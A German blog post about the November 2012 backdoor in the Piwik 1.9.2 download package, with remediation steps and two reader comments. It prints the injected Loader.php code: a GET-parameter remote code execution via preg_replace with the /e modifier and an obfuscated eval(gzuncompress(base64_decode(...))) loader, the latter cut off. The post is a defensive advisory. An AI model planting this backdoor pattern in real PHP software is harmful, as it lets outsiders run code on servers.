Beitrag wurde zuletzt am aktualisiert

Sicherheitslücke: Piwik 1.9.2 Backdoor

Wie Maximilian Grobecker in einem Eintrag vom 27.11.2012 auf seinem Blog berichtete, fiel ihm beim Update seiner Piwik-Installation eine kompromittierte PHP-Datei im Piwik-Paket auf. In der Datei /core/Loader.php wurde zusätzlicher Code eingeschleust, der eine Ausführung von get-Parameter aus der Ferne zu ließ. Er beschreibt den genauen Vorgang in seinem Blog ausführlich – unbedingt lesen!

Der kompromittierte Code in der /core/Loader.php:

<?php Error_Reporting(0);
if(isset($_GET['g']) && isset($_GET['s'])) {
   preg_replace("/(.+)/e", $_GET['g'], 'dwm');
   exit;
}
if (file_exists(dirname(__FILE__)."/lic.log")) exit;
eval(gzuncompress(base64_decode('eF6Fkl9LwzAUxb+KD0I3EOmabhCkD/OhLWNOVrF ...

Schritte zur Problembehebung einer betroffenen Piwik-Installation

Wer Piwik am 26./27. November 2012 geupdated oder neu installiert hat, sollte umgehend nach der eventuell kompromittierten Datei Ausschau halten und die folgenden Schritte ausführen:

  1. Backup der Konfigurationsdatei /config/config.ini.php erstellen
  2. das komplette Piwik-Verzeichnis inklusive aller Dateien und Unterordner löschen
  3. die aktuelle Piwik-Version von piwik.org laden
  4. die zip-Datei entpacken und auf dem Server einspielen
  5. die gesicherte config.ini.php zurück in das /config-Verzeichnis kopieren

Piwik sollte nun wieder bereinigt sein und problemlos funktionieren.

Das Piwik-Team hat umgehend auf diesen Vorfall reagiert und eine „saubere“ Paketdatei bereit gestellt. Auf dem Piwik-Blog wurde eine entsprechende Stellungnahme veröffentlicht.

Der Angreifer hat eine Sicherheitslücke in einem WordPress-Plugin ausgenutzt und sich dadurch Zugriff auf den Piwik-Server verschafft. Auf diesem Weg ließ sich die modifizierte Paketdatei unbemerkt einspielen. Warum es bei Piwik keinen SHA1-Hash oder andere Sicherheitsmechanismen gibt, wird im Forum sowie im Blog bei piwik.org bereits diskutiert.

2 Kommentare zu "Sicherheitslücke: Piwik 1.9.2 Backdoor"

  1. Hi Daniel,
    danke für den Tipp zur Problembehebung und den Link zur genauen Beschreibung des Vorfalls! Ich schau mich ab jetzt öfter mal hier in Deinem Blog um – dürfte sich lohnen, nicht nur bei Piwik-Fragen!
    Gruß
    Reinhard

  2. Ich habe den Vorfall unter technischen Aspekten nochmal etwas genauer beleuchtet: http://geekmonkey.org/articles/42-the-anatomy-of-an-exploit

Hinterlasse einen Kommentar

E-Mail Adresse wird nicht veröffentlicht.


*